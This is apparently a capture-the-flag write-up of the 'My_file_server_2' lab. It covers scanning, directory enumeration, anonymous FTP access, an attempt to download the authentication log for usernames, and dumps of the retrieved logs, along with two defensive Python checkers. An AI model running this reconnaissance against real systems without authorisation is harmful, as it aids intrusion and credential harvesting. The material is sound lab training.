My_file_server_2

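First, scan for the target's IP.

The IP turns out to be 192.168.59.148.

Scan the ports.

Eight ports are open.

Start with port 80.

The page says it is a file server.

Click the link and take a look.

It redirects to a foreign website, so look that up.

armourinfosec.com belongs to ARMOUR INFOSEC PRIVATE LIMITED, a cybersecurity company founded in 2015 in Indore, India. Its core business is cybersecurity training plus penetration testing services, aimed at students and professionals, with a focus on ethical hacking, penetration testing and network security.

Press F12 to look at the HTML source.

Nothing useful there.

Scan the directories first.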

dirsearch -u "http://192.168.59.148"  -i 200 -e*

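The scan turns up a file named readme.txt.

Go take a look.

It tells us that his password is rootroot1.

OK, we now know a password, but not whose it is or what it is for.

Collect some more information.

Fingerprint the web server.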

whatweb -v 192.168.59.148

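Nothing useful.

Check whether the FTP service found earlier allows anonymous login.

How to read the result:

✅ Success: reply code 230 appears

❌ Failure: reply code 530 appears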

nmap -p 21 --script ftp-anon 192.168.59.148

Anonymous login is allowed, and the directory permissions are 777.

Log in.

ftp 192.168.59.148

At the Name prompt, enter anonymous.

When prompted for a password, just press Enter.
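
The 230/530 check above, as an added example that is not part of the original write-up: a small ftplib client performs the anonymous login and returns the server's reply, run here against a constructed local stub server so it works offline. The names `anonymous_login_allowed`, `StubFTPHandler` and `start_stub`, and the stub's reply texts, are made up for this example.

```python
import ftplib
import socketserver
import threading


def anonymous_login_allowed(host, port=21, timeout=5):
    """Attempt USER anonymous / PASS anonymous@ and return (allowed, reply)."""
    ftp = ftplib.FTP()
    ftp.connect(host, port, timeout=timeout)
    try:
        return True, ftp.login()          # 230: user logged in
    except ftplib.error_perm as exc:      # 5xx, e.g. 530: not logged in
        return False, str(exc)
    finally:
        ftp.close()


class StubFTPHandler(socketserver.StreamRequestHandler):
    """CONSTRUCTED stand-in for an FTP server: just enough of the control
    channel to answer a login, so the check can be exercised offline."""

    def reply(self, line):
        self.wfile.write(line.encode("ascii") + b"\r\n")

    def handle(self):
        self.reply("220 stub FTP ready")
        for raw in self.rfile:
            parts = raw.decode("latin-1").split()
            verb = parts[0].upper() if parts else ""
            if verb == "USER":
                self.reply("331 Please specify the password.")
            elif verb == "PASS":
                if self.server.allow_anonymous:
                    self.reply("230 Login successful.")
                else:
                    self.reply("530 Login incorrect.")
            elif verb == "QUIT":
                self.reply("221 Goodbye.")
                return
            else:
                self.reply("502 Command not implemented.")


def start_stub(allow_anonymous):
    """Start the stub on a free loopback port; returns the server object."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), StubFTPHandler)
    server.allow_anonymous = allow_anonymous
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


if __name__ == "__main__":
    for allow in (True, False):
        stub = start_stub(allow)
        print(allow, anonymous_login_allowed("127.0.0.1", stub.server_address[1]))
        stub.shutdown()
        stub.server_close()
```

After anonymous access has been disabled on a server you administer, the same function should return `False` with a 530 reply.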

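Look at what is in log.

Download the authentication log, secure, and look at its contents.

secure:

The Linux system authentication log. It records SSH logins, user authentication and sudo activity. It directly reveals valid system usernames on the target along with successful and failed logins, which makes it the key file when looking for accounts and passwords.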

get secure

The download fails.

On inspection, only the file's owner (root, UID=0) has read and write permission.

Download the other files and look at them.

┌──(root㉿kali)-[~/桌面]
└─# cat cron     
Feb 18 13:33:36 fileserver crond[469]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 83% if used.)
Feb 18 13:33:37 fileserver crond[469]: (CRON) INFO (running with inotify support)
Feb 18 15:00:10 fileserver crond[466]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 64% if used.)
Feb 18 15:00:11 fileserver crond[466]: (CRON) INFO (running with inotify support)
Feb 18 15:01:01 fileserver CROND[2159]: (root) CMD (run-parts /etc/cron.hourly)
Feb 18 15:01:01 fileserver run-parts(/etc/cron.hourly)[2159]: starting 0anacron
Feb 18 15:01:01 fileserver anacron[2168]: Anacron started on 2020-02-18
Feb 18 15:01:01 fileserver run-parts(/etc/cron.hourly)[2170]: finished 0anacron
Feb 18 15:01:01 fileserver anacron[2168]: Will run job `cron.daily' in 36 min.
Feb 18 15:01:01 fileserver anacron[2168]: Will run job `cron.weekly' in 56 min.
Feb 18 15:01:01 fileserver anacron[2168]: Will run job `cron.monthly' in 76 min.
Feb 18 15:01:01 fileserver anacron[2168]: Jobs will be executed sequentially
Feb 18 15:01:01 fileserver run-parts(/etc/cron.hourly)[2159]: starting 0yum-hourly.cron
Feb 18 15:01:01 fileserver run-parts(/etc/cron.hourly)[2176]: finished 0yum-hourly.cron
Feb 18 15:12:44 fileserver crond[460]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 19% if used.)
Feb 18 15:12:44 fileserver crond[460]: (CRON) INFO (running with inotify support)
Feb 18 15:25:22 fileserver crond[2735]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 29% if used.)
Feb 18 15:25:22 fileserver crond[2735]: (CRON) INFO (running with inotify support)
Feb 18 15:25:22 fileserver crond[2735]: (CRON) INFO (@reboot jobs will be run at computer's startup.)
Feb 18 15:48:20 fileserver crond[455]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 63% if used.)
Feb 18 15:48:20 fileserver crond[455]: (CRON) INFO (running with inotify support)
Feb 18 16:01:01 fileserver CROND[2262]: (root) CMD (run-parts /etc/cron.hourly)
Feb 18 16:01:01 fileserver run-parts(/etc/cron.hourly)[2262]: starting 0anacron
Feb 18 16:01:01 fileserver anacron[2271]: Anacron started on 2020-02-18
Feb 18 16:01:01 fileserver anacron[2271]: Will run job `cron.daily' in 20 min.
Feb 18 16:01:01 fileserver anacron[2271]: Will run job `cron.weekly' in 40 min.
Feb 18 16:01:01 fileserver anacron[2271]: Will run job `cron.monthly' in 60 min.
Feb 18 16:01:01 fileserver anacron[2271]: Jobs will be executed sequentially
Feb 18 16:01:01 fileserver run-parts(/etc/cron.hourly)[2273]: finished 0anacron
Feb 18 16:01:01 fileserver run-parts(/etc/cron.hourly)[2262]: starting 0yum-hourly.cron
Feb 18 16:01:01 fileserver run-parts(/etc/cron.hourly)[2279]: finished 0yum-hourly.cron
Feb 18 16:21:01 fileserver anacron[2271]: Job `cron.daily' started
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2546]: starting 0yum-daily.cron
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2553]: finished 0yum-daily.cron
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2546]: starting logrotate
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2560]: finished logrotate
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2546]: starting man-db.cron
Feb 18 16:21:21 fileserver run-parts(/etc/cron.daily)[15744]: finished man-db.cron
Feb 18 16:21:21 fileserver anacron[2271]: Job `cron.daily' terminated
Feb 18 16:26:27 localhost crond[462]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 88% if used.)
Feb 18 16:26:27 localhost crond[462]: (CRON) INFO (running with inotify support)
Feb 18 16:39:35 localhost crond[464]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 8% if used.)
Feb 18 16:39:35 localhost crond[464]: (CRON) INFO (running with inotify support)
Feb 18 16:50:54 localhost crond[464]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 39% if used.)
Feb 18 16:50:54 localhost crond[464]: (CRON) INFO (running with inotify support)
Feb 18 16:58:49 localhost crond[464]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 94% if used.)
Feb 18 16:58:49 localhost crond[464]: (CRON) INFO (running with inotify support)
Feb 18 17:01:01 localhost CROND[1934]: (root) CMD (run-parts /etc/cron.hourly)
Feb 18 17:01:02 localhost run-parts(/etc/cron.hourly)[1934]: starting 0anacron
Feb 18 17:01:02 localhost run-parts(/etc/cron.hourly)[1943]: finished 0anacron
Feb 18 17:01:02 localhost run-parts(/etc/cron.hourly)[1934]: starting 0yum-hourly.cron
Feb 18 17:01:02 localhost run-parts(/etc/cron.hourly)[1949]: finished 0yum-hourly.cron
Feb 18 17:01:33 localhost crond[465]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 3% if used.)
Feb 18 17:01:33 localhost crond[465]: (CRON) INFO (running with inotify support)
Feb 18 17:05:35 localhost crond[469]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 97% if used.)
Feb 18 17:05:35 localhost crond[469]: (CRON) INFO (running with inotify support)
Feb 18 17:22:32 localhost crond[582]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 88% if used.)
Feb 18 17:22:32 localhost crond[582]: (CRON) INFO (running with inotify support)
Feb 18 18:08:32 localhost crond[569]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 98% if used.)
Feb 18 18:08:32 localhost crond[569]: (CRON) INFO (running with inotify support)
Feb 19 10:37:25 localhost crond[557]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 80% if used.)
Feb 19 10:37:25 localhost crond[557]: (CRON) INFO (running with inotify support)
Feb 19 10:43:59 localhost crond[2226]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 10% if used.)
Feb 19 10:43:59 localhost crond[2226]: (CRON) INFO (running with inotify support)
Feb 19 10:43:59 localhost crond[2226]: (CRON) INFO (@reboot jobs will be run at computer's startup.)
Feb 19 10:58:39 localhost crond[606]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 14% if used.)
Feb 19 10:58:39 localhost crond[606]: (CRON) INFO (running with inotify support)
Feb 19 11:01:01 localhost CROND[2038]: (root) CMD (run-parts /etc/cron.hourly)
Feb 19 11:01:02 localhost run-parts(/etc/cron.hourly)[2038]: starting 0anacron
Feb 19 11:01:02 localhost anacron[2047]: Anacron started on 2020-02-19
Feb 19 11:01:02 localhost run-parts(/etc/cron.hourly)[2049]: finished 0anacron
Feb 19 11:01:02 localhost anacron[2047]: Will run job `cron.daily' in 23 min.
Feb 19 11:01:02 localhost anacron[2047]: Will run job `cron.weekly' in 43 min.
Feb 19 11:01:02 localhost anacron[2047]: Will run job `cron.monthly' in 63 min.
Feb 19 11:01:02 localhost anacron[2047]: Jobs will be executed sequentially
Feb 19 11:01:02 localhost run-parts(/etc/cron.hourly)[2038]: starting 0yum-hourly.cron
Feb 19 11:01:02 localhost run-parts(/etc/cron.hourly)[2055]: finished 0yum-hourly.cron
Feb 19 11:54:19 localhost crond[600]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 77% if used.)
Feb 19 11:54:19 localhost crond[600]: (CRON) INFO (running with inotify support)
Feb 19 12:01:02 localhost CROND[2152]: (root) CMD (run-parts /etc/cron.hourly)
Feb 19 12:01:02 localhost run-parts(/etc/cron.hourly)[2152]: starting 0anacron
Feb 19 12:01:02 localhost anacron[2161]: Anacron started on 2020-02-19
Feb 19 12:01:02 localhost run-parts(/etc/cron.hourly)[2163]: finished 0anacron
Feb 19 12:01:02 localhost anacron[2161]: Will run job `cron.daily' in 40 min.
Feb 19 12:01:02 localhost anacron[2161]: Will run job `cron.weekly' in 60 min.
Feb 19 12:01:02 localhost anacron[2161]: Will run job `cron.monthly' in 80 min.
Feb 19 12:01:02 localhost anacron[2161]: Jobs will be executed sequentially
Feb 19 12:01:02 localhost run-parts(/etc/cron.hourly)[2152]: starting 0yum-hourly.cron
Feb 19 12:01:02 localhost run-parts(/etc/cron.hourly)[2169]: finished 0yum-hourly.cron
Feb 19 12:35:42 localhost crond[588]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 59% if used.)
Feb 19 12:35:43 localhost crond[588]: (CRON) INFO (running with inotify support)
Feb 19 12:52:11 localhost crond[577]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 52% if used.)
Feb 19 12:52:12 localhost crond[577]: (CRON) INFO (running with inotify support)
Feb 19 12:59:06 localhost crond[608]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 25% if used.)
Feb 19 12:59:06 localhost crond[608]: (CRON) INFO (running with inotify support)
Feb 19 13:01:01 localhost CROND[2062]: (root) CMD (run-parts /etc/cron.hourly)
Feb 19 13:01:01 localhost run-parts(/etc/cron.hourly)[2062]: starting 0anacron
Feb 19 13:01:01 localhost anacron[2071]: Anacron started on 2020-02-19
Feb 19 13:01:01 localhost anacron[2071]: Will run job `cron.daily' in 38 min.
Feb 19 13:01:01 localhost anacron[2071]: Will run job `cron.weekly' in 58 min.
Feb 19 13:01:01 localhost anacron[2071]: Will run job `cron.monthly' in 78 min.
Feb 19 13:01:01 localhost anacron[2071]: Jobs will be executed sequentially
Feb 19 13:01:01 localhost run-parts(/etc/cron.hourly)[2073]: finished 0anacron
Feb 19 13:01:01 localhost run-parts(/etc/cron.hourly)[2062]: starting 0yum-hourly.cron
Feb 19 13:01:01 localhost run-parts(/etc/cron.hourly)[2079]: finished 0yum-hourly.cron
Feb 19 13:12:04 localhost crond[597]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 47% if used.)
Feb 19 13:12:04 localhost crond[597]: (CRON) INFO (running with inotify support)

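This cron log contains no directly exploitable privilege-escalation point. It is all default Linux scheduled tasks, with no custom script that we could tamper with.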
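
The same review done by script, as an added example that is not part of the original write-up: it extracts every job crond started and every script run-parts launched, and reports anything outside a baseline. The baseline is an assumption built from the entries visible in the log above, and the sample input reuses eight of those lines plus one constructed line.

```python
import re

# "(user) CMD (command)" is logged by crond each time it starts a job.
CMD_RE = re.compile(r"CROND\[\d+\]: \((?P<user>[^)]+)\) CMD \((?P<cmd>.*)\)\s*$")
# run-parts logs every script it starts from a cron.* directory.
PART_RE = re.compile(r"run-parts\((?P<dir>[^)]+)\)\[\d+\]: starting (?P<script>\S+)")

# Baseline taken from the log above (assumption: these are the stock
# CentOS 7 jobs, as the write-up concludes).
BASELINE_CMDS = {("root", "run-parts /etc/cron.hourly")}
BASELINE_SCRIPTS = {
    "/etc/cron.hourly": {"0anacron", "0yum-hourly.cron"},
    "/etc/cron.daily": {"0yum-daily.cron", "logrotate", "man-db.cron"},
}

# The first eight lines are copied from the log above; the last line is
# CONSTRUCTED to show what a non-default job looks like.
SAMPLE_LOG = """\
Feb 18 13:33:36 fileserver crond[469]: (CRON) INFO (RANDOM_DELAY will be scaled with factor 83% if used.)
Feb 18 15:01:01 fileserver CROND[2159]: (root) CMD (run-parts /etc/cron.hourly)
Feb 18 15:01:01 fileserver run-parts(/etc/cron.hourly)[2159]: starting 0anacron
Feb 18 15:01:01 fileserver run-parts(/etc/cron.hourly)[2159]: starting 0yum-hourly.cron
Feb 18 16:21:01 fileserver anacron[2271]: Job `cron.daily' started
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2546]: starting 0yum-daily.cron
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2546]: starting logrotate
Feb 18 16:21:01 fileserver run-parts(/etc/cron.daily)[2546]: starting man-db.cron
Feb 18 17:00:01 fileserver CROND[3001]: (root) CMD (/usr/local/bin/cleanup.sh)
"""


def audit_cron_log(text):
    """Return jobs and run-parts scripts that are not in the baseline,
    de-duplicated, in order of first appearance."""
    findings = []
    for line in text.splitlines():
        cmd = CMD_RE.search(line)
        part = PART_RE.search(line)
        if cmd and (cmd["user"], cmd["cmd"]) not in BASELINE_CMDS:
            item = ("cmd", cmd["user"], cmd["cmd"])
        elif part and part["script"] not in BASELINE_SCRIPTS.get(part["dir"], set()):
            item = ("script", part["dir"], part["script"])
        else:
            continue  # informational line or a baseline entry
        if item not in findings:
            findings.append(item)
    return findings


if __name__ == "__main__":
    for kind, owner, what in audit_cron_log(SAMPLE_LOG):
        print(f"review: {kind:6} {owner:18} {what}")
```

The log only covers jobs that ran inside its time window, so an empty result is not proof that no custom job is configured.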

┌──(root㉿kali)-[~/桌面]
└─# cat boot.log  
[  OK  ] Started Show Plymouth Boot Screen.
[  OK  ] Reached target Paths.
[  OK  ] Reached target Basic System.
[  OK  ] Found device VBOX_HARDDISK.
         Starting File System Check on /dev/disk/by-uuid/18b0d984-25fb-4a58-a008-c0410d32b0cb...
[  OK  ] Started dracut initqueue hook.
[  OK  ] Reached target Remote File Systems (Pre).
[  OK  ] Reached target Remote File Systems.
systemd-fsck[247]: /sbin/fsck.xfs: XFS file system.
[  OK  ] Started File System Check on /dev/disk/by-uuid/18b0d984-25fb-4a58-a008-c0410d32b0cb.
         Mounting /sysroot...
[  OK  ] Mounted /sysroot.
[  OK  ] Reached target Initrd Root File System.
         Starting Reload Configuration from the Real Root...
[  OK  ] Started Reload Configuration from the Real Root.
[  OK  ] Reached target Initrd File Systems.
[  OK  ] Reached target Initrd Default Target.

Welcome to CentOS Linux 7 (Core)!

[  OK  ] Stopped Switch Root.
[  OK  ] Stopped Journal Service.
         Starting Journal Service...
[  OK  ] Reached target Host and Network Name Lookups.
[  OK  ] Listening on Delayed Shutdown Socket.
         Starting Create list of required static device nodes for the current kernel...
[  OK  ] Reached target Local Encrypted Volumes.
[  OK  ] Listening on udev Control Socket.
         Mounting Debug File System...
[  OK  ] Created slice system-selinux\x2dpolicy\x2dmigrate\x2dlocal\x2dchanges.slice.
[  OK  ] Listening on /dev/initctl Compatibility Named Pipe.
[  OK  ] Stopped File System Check on /dev/disk/by-uuid/18b0d984-25fb-4a58-a008-c0410d32b0cb.
[  OK  ] Reached target RPC Port Mapper.
[  OK  ] Created slice system-getty.slice.
[  OK  ] Set up automount Arbitrary Executable File Formats File System Automount Point.
         Starting Remount Root and Kernel File Systems...
[  OK  ] Created slice User and Session Slice.
         Mounting POSIX Message Queue File System...
[  OK  ] Stopped target Switch Root.
[  OK  ] Stopped target Initrd File Systems.
[  OK  ] Stopped target Initrd Root File System.
         Starting Apply Kernel Variables...
[  OK  ] Listening on udev Kernel Socket.
[  OK  ] Started Forward Password Requests to Wall Directory Watch.
         Starting Read and set NIS domainname from /etc/sysconfig/network...
         Mounting Huge Pages File System...
         Mounting NFSD configuration filesystem...
[  OK  ] Reached target Slices.
[  OK  ] Started Create list of required static device nodes for the current kernel.
         Starting Create Static Device Nodes in /dev...
[  OK  ] Started Apply Kernel Variables.
[  OK  ] Mounted Debug File System.
[  OK  ] Mounted POSIX Message Queue File System.
[  OK  ] Mounted Huge Pages File System.
[  OK  ] Started Remount Root and Kernel File Systems.
         Starting udev Coldplug all Devices...
         Starting Configure read-only root support...
[  OK  ] Started Read and set NIS domainname from /etc/sysconfig/network.
[  OK  ] Started Create Static Device Nodes in /dev.
[  OK  ] Started Journal Service.
         Starting Flush Journal to Persistent Storage...
[  OK  ] Reached target Local File Systems (Pre).
         Starting udev Kernel Device Manager...
[  OK  ] Started udev Kernel Device Manager.
[  OK  ] Started Flush Journal to Persistent Storage.
[  OK  ] Mounted NFSD configuration filesystem.
[  OK  ] Started udev Coldplug all Devices.
[  OK  ] Started Configure read-only root support.
         Starting Load/Save Random Seed...
[  OK  ] Started Load/Save Random Seed.
[  OK  ] Found device VBOX_HARDDISK 1.
         Mounting /boot...
[  OK  ] Found device VBOX_HARDDISK 2.
         Activating swap /dev/disk/by-uuid/183bb37f-b951-46bc-9316-566e2950c04d...
[  OK  ] Activated swap /dev/disk/by-uuid/183bb37f-b951-46bc-9316-566e2950c04d.
[  OK  ] Reached target Swap.
[  OK  ] Reached target Sound Card.
[  OK  ] Mounted /boot.
[  OK  ] Reached target Local File Systems.
         Starting Tell Plymouth To Write Out Runtime Data...
         Starting Import network configuration from initramfs...
         Starting Preprocess NFS configuration...
[  OK  ] Started Preprocess NFS configuration.
[  OK  ] Started Import network configuration from initramfs.
         Starting Create Volatile Files and Directories...
[  OK  ] Started Tell Plymouth To Write Out Runtime Data.
[  OK  ] Started Create Volatile Files and Directories.
         Starting Security Auditing Service...
         Mounting RPC Pipe File System...
[  OK  ] Mounted RPC Pipe File System.
[  OK  ] Reached target rpc_pipefs.target.
         Starting NFSv4 ID-name mapping service...
[  OK  ] Started NFSv4 ID-name mapping service.
[  OK  ] Started Security Auditing Service.
         Starting Update UTMP about System Boot/Shutdown...
[  OK  ] Started Update UTMP about System Boot/Shutdown.
[  OK  ] Reached target System Initialization.
[  OK  ] Listening on D-Bus System Message Bus Socket.
[  OK  ] Started Flexible branding.
[  OK  ] Reached target Paths.
[  OK  ] Listening on RPCbind Server Activation Socket.
         Starting RPC bind service...
[  OK  ] Reached target Sockets.
[  OK  ] Reached target Basic System.
         Starting Login Service...
         Starting Dynamic System Tuning Daemon...
[  OK  ] Started D-Bus System Message Bus.
         Starting Network Manager...
         Starting Dump dmesg to /var/log/dmesg...
         Starting System Logging Service...
         Starting GSSAPI Proxy Daemon...
         Starting IPv4 firewall with iptables...
[  OK  ] Started irqbalance daemon.
[  OK  ] Started Daily Cleanup of Temporary Directories.
[  OK  ] Reached target Timers.
[  OK  ] Started RPC bind service.
[  OK  ] Started Login Service.
[  OK  ] Started Dump dmesg to /var/log/dmesg.
[  OK  ] Started System Logging Service.
[  OK  ] Started GSSAPI Proxy Daemon.
[  OK  ] Reached target NFS client services.
[  OK  ] Reached target Remote File Systems (Pre).
[  OK  ] Reached target Remote File Systems.
         Starting Permit User Sessions...
[  OK  ] Started Network Manager.
         Starting Network Manager Wait Online...
[  OK  ] Started Permit User Sessions.
         Starting Terminate Plymouth Boot Screen...

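This boot.log has no value for the penetration test at all. It is just the CentOS 7 boot log, full of default service start-up and filesystem mount steps, with no credentials, vulnerability clues or exploitable configuration.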

┌──(root㉿kali)-[~/桌面]
└─# cat dmesg   
[    0.000000] Initializing cgroup subsys cpuset
[    0.000000] Initializing cgroup subsys cpu
[    0.000000] Initializing cgroup subsys cpuacct
[    0.000000] Linux version 3.10.0-229.el7.x86_64 (builder@kbuilder.dev.centos.org) (gcc version 4.8.2 20140120 (Red Hat 4.8.2-16) (GCC) ) #1 SMP Fri Mar 6 11:36:42 UTC 2015
[    0.000000] Command line: BOOT_IMAGE=/vmlinuz-3.10.0-229.el7.x86_64 root=UUID=18b0d984-25fb-4a58-a008-c0410d32b0cb ro crashkernel=auto rhgb quiet LANG=en_US.UTF-8
[    0.000000] e820: BIOS-provided physical RAM map:
[    0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable
[    0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved
[    0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved
[    0.000000] BIOS-e820: [mem 0x0000000000100000-0x00000000dffeffff] usable
[    0.000000] BIOS-e820: [mem 0x00000000dfff0000-0x00000000dfffffff] ACPI data
[    0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved
[    0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved
[    0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved
[    0.000000] BIOS-e820: [mem 0x0000000100000000-0x000000011cffffff] usable
[    0.000000] NX (Execute Disable) protection: active
[    0.000000] SMBIOS 2.5 present.
[    0.000000] DMI: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[    0.000000] Hypervisor detected: KVM
[    0.000000] e820: update [mem 0x00000000-0x00000fff] usable ==> reserved
[    0.000000] e820: remove [mem 0x000a0000-0x000fffff] usable
[    0.000000] No AGP bridge found
[    0.000000] e820: last_pfn = 0x11d000 max_arch_pfn = 0x400000000
[    0.000000] MTRR default type: uncachable
[    0.000000] MTRR variable ranges disabled:
[    0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
[    0.000000] CPU MTRRs all blank - virtualized system.
[    0.000000] e820: last_pfn = 0xdfff0 max_arch_pfn = 0x400000000
[    0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0]
[    0.000000] Base memory trampoline at [ffff880000099000] 99000 size 24576
[    0.000000] init_memory_mapping: [mem 0x00000000-0x000fffff]
[    0.000000]  [mem 0x00000000-0x000fffff] page 4k
[    0.000000] BRK [0x01ee5000, 0x01ee5fff] PGTABLE
[    0.000000] BRK [0x01ee6000, 0x01ee6fff] PGTABLE
[    0.000000] BRK [0x01ee7000, 0x01ee7fff] PGTABLE
[    0.000000] init_memory_mapping: [mem 0x11ce00000-0x11cffffff]
[    0.000000]  [mem 0x11ce00000-0x11cffffff] page 2M
[    0.000000] BRK [0x01ee8000, 0x01ee8fff] PGTABLE
[    0.000000] init_memory_mapping: [mem 0x11c000000-0x11cdfffff]
[    0.000000]  [mem 0x11c000000-0x11cdfffff] page 2M
[    0.000000] init_memory_mapping: [mem 0x100000000-0x11bffffff]
[    0.000000]  [mem 0x100000000-0x11bffffff] page 2M
[    0.000000] init_memory_mapping: [mem 0x00100000-0xdffeffff]
[    0.000000]  [mem 0x00100000-0x001fffff] page 4k
[    0.000000]  [mem 0x00200000-0xdfdfffff] page 2M
[    0.000000]  [mem 0xdfe00000-0xdffeffff] page 4k
[    0.000000] RAMDISK: [mem 0x3611d000-0x37086fff]
[    0.000000] ACPI: RSDP 00000000000e0000 00024 (v02 VBOX  )
[    0.000000] ACPI: XSDT 00000000dfff0030 0003C (v01 VBOX   VBOXXSDT 00000001 ASL  00000061)
[    0.000000] ACPI: FACP 00000000dfff00f0 000F4 (v04 VBOX   VBOXFACP 00000001 ASL  00000061)
[    0.000000] ACPI: DSDT 00000000dfff0470 02325 (v02 VBOX   VBOXBIOS 00000002 INTL 20191018)
[    0.000000] ACPI: FACS 00000000dfff0200 00040
[    0.000000] ACPI: APIC 00000000dfff0240 00054 (v02 VBOX   VBOXAPIC 00000001 ASL  00000061)
[    0.000000] ACPI: SSDT 00000000dfff02a0 001CC (v01 VBOX   VBOXCPUT 00000002 INTL 20191018)
[    0.000000] ACPI: Local APIC address 0xfee00000
[    0.000000] No NUMA configuration found
[    0.000000] Faking a node at [mem 0x0000000000000000-0x000000011cffffff]
[    0.000000] Initmem setup node 0 [mem 0x00000000-0x11cffffff]
[    0.000000]   NODE_DATA [mem 0x11cfd5000-0x11cffbfff]
[    0.000000] Reserving 161MB of memory at 704MB for crashkernel (System RAM: 4047MB)
[    0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00
[    0.000000] kvm-clock: cpu 0, msr 1:1cf85001, primary cpu clock
[ 4672.342621]  [ffffea0000000000-ffffea00047fffff] PMD -> [ffff880118600000-ffff88011c5fffff] on node 0
[ 4672.342627] Zone ranges:
[ 4672.342628]   DMA      [mem 0x00001000-0x00ffffff]
[ 4672.342629]   DMA32    [mem 0x01000000-0xffffffff]
[ 4672.342630]   Normal   [mem 0x100000000-0x11cffffff]
[ 4672.342631] Movable zone start for each node
[ 4672.342633] Early memory node ranges
[ 4672.342634]   node   0: [mem 0x00001000-0x0009efff]
[ 4672.342635]   node   0: [mem 0x00100000-0xdffeffff]
[ 4672.342635]   node   0: [mem 0x100000000-0x11cffffff]
[ 4672.342637] On node 0 totalpages: 1036174
[ 4672.342638]   DMA zone: 64 pages used for memmap
[ 4672.342639]   DMA zone: 21 pages reserved
[ 4672.342639]   DMA zone: 3998 pages, LIFO batch:0
[ 4672.342719]   DMA32 zone: 14272 pages used for memmap
[ 4672.342720]   DMA32 zone: 913392 pages, LIFO batch:31
[ 4672.358179]   Normal zone: 1856 pages used for memmap
[ 4672.358181]   Normal zone: 118784 pages, LIFO batch:31
[ 4672.360366] ACPI: PM-Timer IO Port: 0x4008
[ 4672.360367] ACPI: Local APIC address 0xfee00000
[ 4672.360377] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
[ 4672.360380] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
[ 4672.360419] IOAPIC[0]: apic_id 1, version 32, address 0xfec00000, GSI 0-23
[ 4672.360421] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
[ 4672.360422] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level)
[ 4672.360423] ACPI: IRQ0 used by override.
[ 4672.360423] ACPI: IRQ2 used by override.
[ 4672.360424] ACPI: IRQ9 used by override.
[ 4672.360426] Using ACPI (MADT) for SMP configuration information
[ 4672.360428] smpboot: Allowing 1 CPUs, 0 hotplug CPUs
[ 4672.360467] nr_irqs_gsi: 40
[ 4672.360495] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff]
[ 4672.360496] PM: Registered nosave memory: [mem 0x000a0000-0x000effff]
[ 4672.360496] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff]
[ 4672.360497] PM: Registered nosave memory: [mem 0xdfff0000-0xdfffffff]
[ 4672.360498] PM: Registered nosave memory: [mem 0xe0000000-0xfebfffff]
[ 4672.360498] PM: Registered nosave memory: [mem 0xfec00000-0xfec00fff]
[ 4672.360499] PM: Registered nosave memory: [mem 0xfec01000-0xfedfffff]
[ 4672.360499] PM: Registered nosave memory: [mem 0xfee00000-0xfee00fff]
[ 4672.360500] PM: Registered nosave memory: [mem 0xfee01000-0xfffbffff]
[ 4672.360500] PM: Registered nosave memory: [mem 0xfffc0000-0xffffffff]
[ 4672.360502] e820: [mem 0xe0000000-0xfebfffff] available for PCI devices
[ 4672.360503] Booting paravirtualized kernel on KVM
[ 4672.360504] Detected CPU family 6 model 158
[ 4672.360505] Warning: Intel CPU model - this hardware has not undergone upstream testing. Please consult http://wiki.centos.org/FAQ for more information
[ 4672.360508] setup_percpu: NR_CPUS:5120 nr_cpumask_bits:1 nr_cpu_ids:1 nr_node_ids:1
[ 4672.360659] PERCPU: Embedded 28 pages/cpu @ffff88011cc00000 s82752 r8192 d23744 u2097152
[ 4672.360662] pcpu-alloc: s82752 r8192 d23744 u2097152 alloc=1*2097152
[ 4672.360663] pcpu-alloc: [0] 0 
[ 4672.360675] Built 1 zonelists in Node order, mobility grouping on.  Total pages: 1019961
[ 4672.360676] Policy zone: Normal
